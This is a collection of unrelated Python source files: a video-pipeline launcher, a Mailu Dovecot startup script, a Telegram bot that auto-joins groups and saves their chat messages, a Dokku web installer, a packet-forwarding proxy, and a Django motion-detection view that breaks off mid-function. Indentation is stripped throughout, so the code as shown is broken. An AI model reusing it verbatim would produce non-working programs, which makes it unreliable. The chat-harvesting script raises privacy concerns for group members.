number_input_args = sum(len(inp_x) > 0 for inp_x in [args.input_video, args.input_dir, args.input_list])
if number_input_args == 0 or args.pipeline == no_pipeline:
if not args.build_index and not args.detection_plots and not args.track_plots:
exit_with_error( "Either input video or input directory must be specified" )
else:
process_data = False
elif number_input_args > 1:
exit_with_error( "Only one of input video, directory, or list should be specified, not more" )
if ( args.detection_plots or args.track_plots ) and len( args.frame_rate ) == 0:
exit_with_error( "Must specify frame rate if generating detection or track plots" )
signal.signal( signal.SIGINT, signal_handler )
# Initialize database
if args.init_db:
if len( args.log_directory ) > 0:
init_log_file = args.output_directory + div + args.log_directory + div + "database_log.txt"
else:
init_log_file = ""
db_is_init, user_select = database_tool.init( log_file=init_log_file, prompt=(not args.no_reset_prompt) )
if not db_is_init:
if user_select:
log_info( "User decided to not initialize new database, shutting down." + lb2 )
sys.exit( 0 )
elif len( args.log_directory ) > 0:
exit_with_error( "Unable to initialize database, check " + init_log_file + lb2 +
"You may have another database running on your system, or ran "
"a failed operation in the past and need to re-log or restart." )
else:
exit_with_error( "Unable to initialize database" )
log_info( lb1 )
# Call processing pipelines on all input data
if process_data:
# Handle output directory creation if necessary
if len( args.output_directory ) > 0:
recreate_dir = ( not args.init_db and not args.no_reset_prompt )
prompt_user = ( not args.no_reset_prompt )
create_dir( args.output_directory, logging=False, recreate=recreate_dir, prompt=prompt_user )
if len( args.log_directory ) > 0:
create_dir( args.output_directory + div + args.log_directory, logging=False )
# Identify all videos to process
if len( args.input_list ) > 0:
if args.gpu_count > 1:
video_list = split_image_list( args.input_list, args.gpu_count, args.output_directory )
else:
video_list = [ args.input_list ]
is_image_list = True
elif len( args.input_dir ) > 0:
video_list = list_videos_in_dir( args.input_dir, args.video_exts )
is_image_list = False
else:
video_list = [ args.input_video ]
is_image_list = False
if len( video_list ) == 0:
exit_with_error( "No videos found for ingest in given folder, exiting." )
elif not is_image_list:
if not args.init_db:
log_info( lb1 )
video_str = " video" if len( video_list ) == 1 else " videos"
log_info( "Processing " + str( len( video_list ) ) + video_str + lb2 )
elif not args.build_index:
log_info( lb1 )
# Check for local pipelines and pre-reqs present
if "_local.pipe" in args.pipeline:
if not os.path.exists( "category_models/detector.pipe" ):
if has_file_with_extension( "category_models", "svm" ):
if args.pipeline.endswith( "detector_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "detector_svm_models.pipe" )
elif args.pipeline.endswith( "full_frame_classifier_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "full_frame_classifier_svm.pipe" )
elif args.pipeline.endswith( "tracker_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "tracker_svm_models.pipe" )
else:
exit_with_error( "Use of this script requires training a detector first" )
else:
exit_with_error( "Use of this script requires training a detector first" )
# Process videos in parallel, one per GPU
video_queue = queue.Queue()
for video_name in video_list:
if os.path.isfile( video_name ) or os.path.isdir( video_name ):
video_queue.put( video_name )
else:
log_info( "Skipping unknown input: " + video_name + lb )
def process_video_thread( gpu, cpu ):
while True:
try:
video_name = video_queue.get_nowait()
except queue.Empty:
break
process_video_kwiver( video_name, args, is_image_list,
cpu=cpu, gpu=gpu, write_track_time=not is_image_list )
gpu_thread_list = [ i for i in range( args.gpu_count ) for _ in range( args.pipes ) ]
cpu_thread_list = list( range( args.pipes ) ) * args.gpu_count
threads = [ threading.Thread( target = process_video_thread, args = (gpu,cpu,) )
for gpu, cpu in zip( gpu_thread_list, cpu_thread_list ) ]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if is_image_list:
if args.gpu_count > 1: # Each thread outputs 1 list, add multiple
add_final_list_csv( args, video_list )
for image_list in video_list: # Clean up after split_image_list
os.unlink( image_list )
if not video_queue.empty():
exit_with_error( "Some videos were not processed!" )
# Build out detection vs time plots for both detections and tracks
if args.detection_plots:
import generate_detection_plots
log_info( lb1 + "Generating data plots for detections" )
detection_plot_dir = os.path.join( args.output_directory, "detection_plots" )
create_dir( detection_plot_dir, logging=False, recreate=True, prompt=False )
generate_detection_plots.detection_plot( args.output_directory,
detection_plot_dir, args.objects.split( "," ), float( args.plot_threshold ),
float( args.frame_rate ), int( args.smooth ),
ext = detection_ext, top_category_only = False )
if args.track_plots:
import generate_detection_plots
log_info( lb1 + "Generating data plots for tracks" )
track_plot_dir = os.path.join( args.output_directory, "track_plots" )
create_dir( track_plot_dir, logging=False, recreate=True, prompt=False )
generate_detection_plots.detection_plot( args.output_directory,
track_plot_dir, args.objects.split( "," ), float( args.plot_threshold ),
float( args.frame_rate ), int( args.smooth ),
ext = track_ext, top_category_only = True )
if args.detection_plots or args.track_plots:
log_info( lb1 )
# Build searchable index
if args.build_index:
log_info( lb1 + "Building searchable index" + lb2 )
if len( args.log_directory ) > 0 and args.log_directory != "PIPE":
index_log_file = args.output_directory + div + args.log_directory + div + "smqtk_indexer.txt"
else:
index_log_file = ""
if args.ball_tree:
print( "Warning: building a ball tree is deprecated" )
if not database_tool.build_standard_index( remove_quotes( args.install_dir ),
log_file = index_log_file ):
exit_with_error( "Unable to build index" )
# Output complete message
if os.name == 'nt':
log_info( lb1 + "Processing complete, close this window before launching any GUI." + lb2 )
else:
log_info( lb1 + "Processing complete" + lb2 )
|
start.py
|
#!/usr/bin/python3
import os
import glob
import multiprocessing
import logging as log
import sys
from podop import run_server
from socrate import system, conf
log.basicConfig(stream=sys.stderr, level=os.environ.get("LOG_LEVEL", "WARNING"))
def start_podop():
os.setuid(8)
url = "http://" + os.environ["ADMIN_ADDRESS"] + "/internal/dovecot/§"
run_server(0, "dovecot", "/tmp/podop.socket", [
("quota", "url", url ),
("auth", "url", url),
("sieve", "url", url),
])
# Actual startup script
os.environ["FRONT_ADDRESS"] = system.resolve_address(os.environ.get("HOST_FRONT", "front"))
os.environ["REDIS_ADDRESS"] = system.resolve_address(os.environ.get("HOST_REDIS", "redis"))
os.environ["ADMIN_ADDRESS"] = system.resolve_address(os.environ.get("HOST_ADMIN", "admin"))
os.environ["ANTISPAM_ADDRESS"] = system.resolve_address(os.environ.get("HOST_ANTISPAM", "antispam:11334"))
if os.environ["WEBMAIL"] != "none":
os.environ["WEBMAIL_ADDRESS"] = system.resolve_address(os.environ.get("HOST_WEBMAIL", "webmail"))
for dovecot_file in glob.glob("/conf/*.conf"):
conf.jinja(dovecot_file, os.environ, os.path.join("/etc/dovecot", os.path.basename(dovecot_file)))
os.makedirs("/conf/bin", exist_ok=True)
for script_file in glob.glob("/conf/*.script"):
out_file = os.path.join("/conf/bin/", os.path.basename(script_file).replace('.script',''))
conf.jinja(script_file, os.environ, out_file)
os.chmod(out_file, 0o555)
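# Illustrative sketch (not part of Mailu): conf.jinja() above renders a template file
# with the process environment as its context. A rough stand-in using jinja2 directly
# (the template text below is a made-up example) would look like this:
def _demo_render_template(template_text="listen = {{ FRONT_ADDRESS }}"):
    import jinja2
    return jinja2.Template(template_text).render(**os.environ)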
# Run Podop, then postfix
multiprocessing.Process(target=start_podop).start()
os.system("chown mail:mail /mail")
os.system("chown -R mail:mail /var/lib/dovecot /conf")
os.execv("/usr/sbin/dovecot", ["dovecot", "-c", "/etc/dovecot/dovecot.conf", "-F"])
|
Connector.py
|
# -*- coding:utf-8 -*-
import codecs
import datetime
import json
import sched
import optparse
import os
import time
import TelethonB
import threading
import sys
from telethon import TelegramClient
from telethon import errors
from telethon.tl.functions.channels import LeaveChannelRequest
from telethon.tl.functions.channels import JoinChannelRequest
class TelegramOperator:
#Debugging Methods & co
def return_values(self, objekt):
for thing in dir(objekt):
print(thing+" : "+str(getattr(objekt, thing)))
def clear_terminal(self):
os.system('cls' if os.name == 'nt' else 'clear')
#end of debugging
def __init__(self):
#self.print_lock = threading.Lock()
settings = self.read_settings()
try:
settings["telegram_api"] = int(settings["telegram_api"])
except ValueError:
print("[!] API Code is incorrect. Please check config.txt and correct the error!")
sys.exit()
self.client = TelegramClient(settings["username"], settings["telegram_api"], settings["api_hash"])
self.client.start()
self.msg_avg_deviation = settings["min_activity"]
self.msg_average = self.calc_average()
self.groups = list()
self.leftout_groups = set()
self.dialog_names = set()
self.blacklist = self.load_blocked_groups()
self.initialize_run()
self.leave = False
def create_settings(self):
default = {"telegram_api":"Your api here",
"api_hash": "Your hash here",
"username":"Your username here",
"#1/Xth ot the average activity(messages per runtime) required to not be marked as inactive. default: 1/3th":"",
"min_activity":"3",
}
with codecs.open("config.txt", "w", encoding="utf-8") as config:
for key in default:
if default[key] != "":
config.write("{}={}\n".format(key, default[key]))
else:
config.write("{}\n".format(key))
print("[*] Please fill in your api data into the config.txt")
def read_settings(self):
settings = dict()
try:
with codecs.open("config.txt", "r", encoding="utf-8") as config:
data = config.readlines()
for entry in data:
if "#" not in entry:
entry = [entry.strip() for entry in entry.split("=")]
settings[entry[0]] = entry[1]
config.close()
except FileNotFoundError:
print("[!] config.txt not found. Creating it...")
self.create_settings()
sys.exit()
return settings
def write_data(self, data, filename):
with codecs.open(filename, "w", encoding="utf-8") as output:
for dataset in data:
if len(dataset) > 0:
if isinstance(dataset, list):
temp = ""
for ele in dataset:
temp += ele+";"
                        dataset = temp[:-1]  # drop only the trailing ";" separator
print(dataset)
output.write(str(dataset)+"\n")
def get_highest_chatblock(self):
try:
block_number = max([int(filename.split("-")[1]) for filename in os.listdir() if "chat_block" in filename])+1
return block_number
except ValueError:
return 0
def join_groups(self, groups, blacklist):
"""Tries to join groups if it is not blacklisted"""
floodwait = False
for group in groups:
if group not in blacklist and group not in self.dialog_names:
if not floodwait:
print("[*] Trying to join {}..".format(group))
try:
channel = self.client.get_entity(group)
self.client(JoinChannelRequest(channel))
self.dialog_names.add(group) #avoid trying to join the same group twice
print(" [+]->Succesfully joined {} ".format(group))
except errors.rpc_error_list.FloodWaitError as e:
floodwait = True
self.leftout_groups.add(group)
date = datetime.datetime.now()
self.block = date + datetime.timedelta(seconds = e.seconds) #adds waittime to current time to determine the date when the block ends
print(" [!]->"+str(e))
except errors.rpc_error_list.UsernameInvalidError as e:
self.blacklist.add(group)
print(" [!]->"+str(e))
except errors.rpc_error_list.UsernameNotOccupiedError as e:
self.blacklist.add(group)
print(" [!]->"+str(e))
except TypeError as e:
self.blacklist.add(group)
print(" [!]->"+str(e))
except errors.rpc_error_list.InviteHashExpiredError as e:
self.blacklist.add(group)
print(" [!]->"+str(e))
else:
self.leftout_groups.add(group)
def collect_data(self):
"""Gathers the saved data from each channel and writes it to files"""
chatoutput = list()
blacklist = set()
join_groups = self.read_leftout_groups()
metadata = list()
for channel in self.groups:
if channel.active:
self.blacklist = self.blacklist.union(channel.groups_blocked)
join_groups = join_groups.union(channel.groups)
chatoutput.append(channel.output)
metadata.append(channel.metadata)
else:
if self.leave:
self.leavechannel(channel.dialog)
self.join_groups(join_groups, blacklist)
self.write_data(self.blacklist, "blocked_groups")
self.write_data(metadata, "groups.meta")
block_number = self.get_highest_chatblock()
self.write_data(chatoutput, "chat_block-{}".format(block_number))
self.write_leftout_groups()
def leavechannel(self, dialog):
try:
self.client(LeaveChannelRequest(dialog.entity))
self.blacklist.add(dialog.name)
print("[*] Left Channel: {}".format(dialog.name))
except RuntimeError as e:
print(e)
def calc_average(self):
try:
with codecs.open("groups.meta", "r", encoding="utf-8") as readfile:
numbers = [entry.split(";")[1] for entry in readfile.readlines() if len(entry) > 6]
readfile.close()
if len(numbers) == 0:
return 0
sum = 0
for number in numbers:
sum += int(number)
return sum/len(numbers)
except FileNotFoundError:
return 0
def check_groups(self):
dialogs = self.client.get_dialogs(limit=5000)
for dialog in dialogs:
print(dialog.name)
def load_blocked_groups(self):
"""Loads the blacklisted groups into the memory"""
print(" ->[*] Loading group blacklist...")
blacklist = set()
if os.access("blocked_groups", os.F_OK):
with codecs.open("blocked_groups", "r", encoding="utf-8") as groups:
blocked_groups = groups.readlines()
for group in blocked_groups:
blacklist.add(group.strip()) # strip the trailing newline so names match dialog names
return blacklist
def initialize_run(self):
"""Loads dialogs and starts them one after the other"""
dialogs = self.client.get_dialogs(limit=5000)
self.groups = list()
for dialog in dialogs:
try:
self.groups.append(TelethonB.Channel(dialog, self.msg_average, self.msg_avg_deviation, self.client)) #Creates list of channel objects
self.dialog_names.add(dialog.name)
except TypeError as e:
print(e)
continue
except RuntimeError as e:
print(e)
continue
print("[+] All groups successfully initialized!")
def run_multi(self, count, leave):
self.leave = leave
threads = list()
for channel in self.groups:
thread = threading.Thread(target=channel.run, args=(count,))
threads.append(thread)
for thread in threads: #Starts Threads
thread.start()
for thread in threads: #Joins threads so further action will be made, after all Threads are finished
print("[*] Joining {}/{}".format(thread.name, str(len(threads))))
thread.join()
self.collect_data()
threads = [] #empty thread list
print("_--------------------all finished-------------------_")
def write_leftout_groups(self):
with codecs.open("leftout_groups", "w", encoding="utf-8") as output:
for group in self.leftout_groups:
output.write(group+"\n")
def read_leftout_groups(self):
if os.access("leftout_groups", os.F_OK):
with codecs.open("leftout_groups", "r", encoding="utf-8") as input:
groups = input.readlines()
return set(group.strip() for group in groups) # strip newlines so names compare cleanly
else:
return set()
def run(self, count, leave):
self.read_leftout_groups()
self.leave = leave
for channel in self.groups:
print("[+] Running Channel: {}".format(channel.name))
channel.run(count)
self.collect_data()
print("_--------------------all finished-------------------_")
def main():
parser = optparse.OptionParser("usage: {} -m <0/1> (0=single-, 1=multiprocessing) -t <time in seconds> -r <repetitions> -l <0/1>".format(os.path.basename(__file__)))
parser.add_option("-m", dest="tgtMode", type="int", help="choose runmode, 0 for singleprocessed, 1 for multiprocessed")
parser.add_option("-t", dest="tgtTime", type="int", help="Specify wait time between runs")
parser.add_option("-r", dest="tgtRep", type="int", help="Specify how often the the software is run")
parser.add_option("-l", dest="tgtLeave", type="int", help="0 to stay in inactive groups, 1 to leave inactive groups")
(options, args) = parser.parse_args()
tgtMode = options.tgtMode
seconds = options.tgtTime
tgtRep = options.tgtRep
tgtLeave = options.tgtLeave
if (tgtMode is None) or (tgtRep is None) or (seconds == 0 and tgtRep > 1) or (tgtLeave is not None and tgtLeave != 0 and tgtLeave != 1) or (tgtMode != 1 and tgtMode != 0):
print(parser.usage)
exit(0)
if tgtLeave == None: #Don't leave groups on default
print("No arguments for -l -> Default set to False, inactive groups won't be left")
leave = False
elif tgtLeave == 1:
leave = True
elif tgtLeave == 0:
leave = False
count = 0
while(count<tgtRep):
top = TelegramOperator() #Object is recreated every time to reset the data
s = sched.scheduler(time.time, time.sleep)
if tgtMode == 0:
s.enter(seconds, 1, top.run, (count,leave,))
elif tgtMode == 1:
s.enter(seconds, 1, top.run_multi, (count,leave,))
print("Running in {} seconds".format(seconds))
s.run()
count+=1
if __name__ == "__main__":
main()
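# Example invocation (illustrative; the script name is a placeholder): run
# multiprocessed, wait 60 seconds before each run, repeat twice, and leave
# inactive groups:
#
# python operator_script.py -m 1 -t 60 -r 2 -l 1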
|
dokku-installer.py
|
#!/usr/bin/env python3
import cgi
import json
import os
import re
import shutil
try:
import SimpleHTTPServer
import SocketServer
except ImportError:
import http.server as SimpleHTTPServer
import socketserver as SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.24.3'
def bytes_to_string(b):
if type(b) == bytes:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
b = b.decode(encoding)
b = b.strip()
return b
def string_to_bytes(s):
if type(s) == str:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
s = s.encode(encoding)
return s
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = bytes_to_string(subprocess.check_output(command, shell=True))
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', None)
if os.path.isfile('/home/ec2-user/.ssh/authorized_keys'):
key_file = '/home/ec2-user/.ssh/authorized_keys'
elif os.path.isfile('/home/ubuntu/.ssh/authorized_keys'):
key_file = '/home/ubuntu/.ssh/authorized_keys'
else:
key_file = '/root/.ssh/authorized_keys'
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = bytes_to_string(subprocess.check_output(command, shell=True)).strip().split("\n")
except subprocess.CalledProcessError:
pass
ufw_display = 'block'
try:
command = "sudo ufw status"
ufw_output = bytes_to_string(subprocess.check_output(command, shell=True).strip())
if "inactive" in ufw_output:
ufw_display = 'none'
except subprocess.CalledProcessError:
ufw_display = 'none'
nginx_dir = '/etc/nginx'
nginx_init = '/etc/init.d/nginx'
try:
command = "test -x /usr/bin/openresty"
subprocess.check_output(command, shell=True)
nginx_dir = '/usr/local/openresty/nginx/conf'
nginx_init = '/etc/init.d/openresty'
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_conf_dir = os.getenv('NGINX_CONF_DIR', '{0}/conf.d'.format(nginx_dir))
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_conf_dir):
with open('{0}/dokku-installer.conf'.format(nginx_conf_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f {0}/sites-enabled/*'.format(nginx_dir), shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def write_content(self, content):
try:
self.wfile.write(content)
except TypeError:
self.wfile.write(string_to_bytes(content))
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{UFW_DISPLAY}', ufw_display)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{AUTHORIZED_KEYS_LOCATION}', key_file)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.write_content(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
dokku_user = os.getenv('DOKKU_SYSTEM_GROUP', 'dokku')
dokku_group = os.getenv('DOKKU_SYSTEM_USER', 'dokku')
vhost_enable = 'false'
vhost_filename = '{0}/VHOST'.format(dokku_root)
if 'vhost' in params and params['vhost'].value == 'true':
vhost_enable = 'true'
with open(vhost_filename, 'w') as f:
f.write(params['hostname'].value.strip("/"))
shutil.chown(vhost_filename, dokku_user, dokku_group)
else:
try:
os.remove(vhost_filename)
except OSError:
pass
hostname_filename = '{0}/HOSTNAME'.format(dokku_root)
with open(hostname_filename, 'w') as f:
f.write(params['hostname'].value.strip("/"))
shutil.chown(hostname_filename, dokku_user, dokku_group)
for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
user = 'admin'
if self.admin_user_exists() is not None:
user = 'web-admin'
if self.web_admin_user_exists() is not None:
index = int(self.web_admin_user_exists()) + 1
elif self.web_admin_user_exists() is None:
index = 1
elif self.admin_user_exists() is None:
pass
else:
index = int(self.admin_user_exists()) + 1
user = user + str(index)
command = ['sshcommand', 'acl-add', 'dokku', user]
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
try:
proc.stdin.write(key)
except TypeError:
proc.stdin.write(string_to_bytes(key))
proc.stdin.close()
proc.wait()
set_debconf_selection('boolean', 'nginx_enable', 'true')
set_debconf_selection('boolean', 'skip_key_file', 'true')
set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
set_debconf_selection('boolean', 'web_config', 'false')
set_debconf_selection('string', 'hostname', params['hostname'].value)
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
content = json.dumps({'status': 'ok'})
self.send_response(200)
self.end_headers()
self.write_content(content)
def web_admin_user_exists(self):
return self.user_exists(r'web-admin(\d+)')
def admin_user_exists(self):
return self.user_exists(r'admin(\d+)')
def user_exists(self, name):
command = 'dokku ssh-keys:list'
pattern = re.compile(r'NAME="' + name + '"')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
max_num = 0
exists = False
for line in proc.stdout:
m = pattern.search(bytes_to_string(line))
if m:
# User of the form `user` or `user#` exists
exists = True
max_num = max(max_num, int(m.group(1)))
if exists:
return max_num
else:
return None
def set_debconf_selection(debconf_type, key, value):
found = False
with open('/etc/os-release', 'r') as f:
for line in f:
if 'debian' in line:
found = True
if not found:
return
ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
key, debconf_type, value
)], stdout=subprocess.PIPE)
try:
subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
except subprocess.CalledProcessError:
pass
ps.wait()
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm {0}/conf.d/dokku-installer.conf && {1} stop && {1} start".format(nginx_dir, nginx_init)
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print("Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port))
httpd.serve_forever()
PAGE = """
<html>
<head>
<meta charset="utf-8" />
<title>Dokku Setup</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
<style>
.bd-callout {
padding: 1.25rem;
margin-top: 1.25rem;
margin-bottom: 1.25rem;
border: 1px solid #eee;
border-left-width: .25rem;
border-radius: .25rem;
}
.bd-callout p:last-child {
margin-bottom: 0;
}
.bd-callout-info {
border-left-color: #5bc0de;
}
pre {
font-size: 80%;
margin-bottom: 0;
}
h1 small {
font-size: 50%;
}
h5 {
font-size: 1rem;
}
.container {
width: 640px;
}
.result {
padding-left: 20px;
}
input.form-control, textarea.form-control {
background-color: #fafbfc;
font-size: 14px;
}
input.form-control::placeholder, textarea.form-control::placeholder {
color: #adb2b8
}
</style>
</head>
<body>
<div class="container">
<form id="form" role="form">
<h1 class="pt-3">Dokku Setup <small class="text-muted">{VERSION}</small></h1>
<div class="alert alert-warning small" role="alert">
<strong>Warning:</strong> The SSH key filled out here can grant root access to the server. Please complete the setup as soon as possible.
</div>
<div class="row">
<div class="col">
<h3>Admin Access</h3>
<div class="form-group">
<label for="key">Public SSH Keys</label><br />
<textarea class="form-control" name="keys" rows="5" id="key" placeholder="Begins with 'ssh-rsa', 'ssh-dss', 'ssh-ed25519', 'ecdsa-sha2-nistp256', 'ecdsa-sha2-nistp384', or 'ecdsa-sha2-nistp521'">{ADMIN_KEYS}</textarea>
<small class="form-text text-muted">Public keys allow users to ssh onto the server as the <code>dokku</code> user, as well as remotely execute Dokku commands. They are currently auto-populated from: <code>{AUTHORIZED_KEYS_LOCATION}</code>, and can be changed later via the <a href="https://dokku.com/docs/deployment/user-management/" target="_blank"><code>dokku ssh-keys</code></a> plugin.</small>
</div>
</div>
</div>
<div class="row">
<div class="col">
<h3>Hostname Configuration</h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" placeholder="A hostname or ip address such as {HOSTNAME}" />
<small class="form-text text-muted">This will be used as the default host for all applications, and can be changed later via the <a href="https://dokku.com/docs/configuration/domains/" target="_blank"><code>dokku domains:set-global</code></a> command.</small>
</div>
<div class="form-check">
<input class="form-check-input" type="checkbox" id="vhost" name="vhost" value="true">
<label class="form-check-label" for="vhost">Use virtualhost naming for apps</label>
<small class="form-text text-muted">When enabled, Nginx will be run on port 80 and proxy requests to apps based on hostname.</small>
<small class="form-text text-muted">When disabled, a specific port will be setup for each application on first deploy, and requests to that port will be proxied to the relevant app.</small>
</div>
<div class="alert alert-warning small mt-3 d-{UFW_DISPLAY}" role="alert">
<strong>Warning:</strong> UFW is active. To allow traffic to specific ports, run <code>sudo ufw allow PORT</code> for the port in question.
</div>
<div class="bd-callout bd-callout-info">
<h5>What will app URLs look like?</h5>
<pre><code id="example">http://hostname:port</code></pre>
</div>
</div>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span class="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
var $ = document.querySelector.bind(document)
function setup() {
if ($("#key").value.trim() == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($("#hostname").value.trim() == "") {
alert("Your hostname cannot be blank.")
return
}
var data = new FormData($("#form"))
var inputs = [].slice.call(document.querySelectorAll("input, textarea, button"))
inputs.forEach(function (input) {
input.disabled = true
})
var result = $(".result")
fetch("/setup", {method: "POST", body: data})
.then(function(response) {
if (response.ok) {
return response.json()
} else {
throw new Error('Server returned error')
}
})
.then(function(response) {
result.classList.add("text-success");
result.textContent = "Success! Redirecting in 3 seconds. .."
setTimeout(function() {
window.location.href = "https://dokku.com/docs~{VERSION}/deployment/application-deployment/";
}, 3000);
})
.catch(function (error) {
result.classList.add("text-danger");
result.textContent = "Could not send the request"
})
}
function update() {
if ($("#vhost").matches(":checked") && $("#hostname").value.match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").checked = false;
}
if ($("#vhost").matches(':checked')) {
$("#example").textContent = "http://<app-name>."+$("#hostname").value
} else {
$("#example").textContent = "http://"+$("#hostname").value+":<app-port>"
}
}
$("#vhost").addEventListener("change", update);
$("#hostname").addEventListener("input", update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
network.py
|
import socket
import threading
from typing import *
from utils.protocol import iter_packets_from_socket, sessions, local
def forward(source: socket.socket, destination: socket.socket,
process: Callable[[bytes], bytes], session_id: int, direction: int):
"""
direction: 0:c2s, 1:s2c
receive packets from source, process them using process function and send them to destination
note: process function should receive a FULL network packet and return a FULL network packet.
there is an auto_unpack_pack function you can use to simplify this process
"""
local.session_id = session_id
local.direction = direction
local.source = source
local.destination = destination
if local.session_id not in sessions:
sessions[local.session_id] = {'state': 0, 'compression_threshold': -1, 'dimension': 0, 'username': ''}
for packet in iter_packets_from_socket(local.source):
try:
packet = process(packet)
except KeyError:
continue
# if the packet was discarded (e.g. a chunk-data ack packet), don't forward it to the MC server
if not packet:
continue
try:
local.destination.sendall(packet)
except OSError:
break
except ConnectionAbortedError:
break
local.source.close()
local.destination.close()
if local.session_id in sessions:
del sessions[local.session_id]
def proxy(listen_ip: str, listen_port: int, dst_ip: str, dst_port: int,
s2c_process: Callable[[bytes], bytes], c2s_process: Callable[[bytes], bytes]):
"""
a proxy that forwards data
"""
session_id = 0
while True:
try:
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
proxy_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
proxy_socket.bind((listen_ip, listen_port))
proxy_socket.listen(5)
while True:
client_socket = proxy_socket.accept()[0]
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.connect((dst_ip, dst_port))
threading.Thread(target=forward, args=(client_socket, server_socket, c2s_process, session_id, 0)).start()
threading.Thread(target=forward, args=(server_socket, client_socket, s2c_process, session_id, 1)).start()
session_id += 1
finally:
pass
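# Minimal usage sketch (not part of the original module): run the proxy with
# pass-through callbacks. Addresses and ports are placeholders (25565 is only
# assumed here because the comments above mention a Minecraft server).
#
# def passthrough(packet: bytes) -> bytes:
#     return packet  # forward every packet unchanged
#
# proxy('0.0.0.0', 25565, '127.0.0.1', 25566, passthrough, passthrough)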
|
views.py
|
from django.shortcuts import render
# Create your views here.
from django.http import StreamingHttpResponse
from .models import SingleMotionDetector
from imutils.video import VideoStream
import threading
import datetime
import imutils
import time
import cv2
# initialize the output frame and a lock used to ensure thread-safe
# exchanges of the output frames (useful when multiple browsers/tabs
# are viewing the stream)
outputFrame = None
lock = threading.Lock()
# initialize the video stream and allow the camera sensor to warmup
# vs = VideoStream(usePiCamera=1).start()
vs = VideoStream(src=0).start()
time.sleep(2.0)
def index(request):
# return the rendered template
return render(request, 'motion_detect/index.html')
def detect_motion(frameCount):
# grab global references to the video stream, output frame, and
# lock variables
global vs, outputFrame, lock
# initialize the motion detector and the total number of frames read thus far
md = SingleMotionDetector(accumWeight=0.1)
total = 0
# loop over frames from the video stream
while True:
# read the next frame from the video stream, resize it, convert the frame to grayscale, and blur it
frame = vs.read()
frame = imutils.resize(frame, width=400)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# grab the current timestamp and draw it on the frame
timestamp = datetime.datetime.now()
cv2.putText(frame, timestamp.strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# if the total number of frames has reached a sufficient number to construct a reasonable background model, then
# continue to process the frame
if total > frameCount:
# detect motion in the image
motion = md.detect(gray)
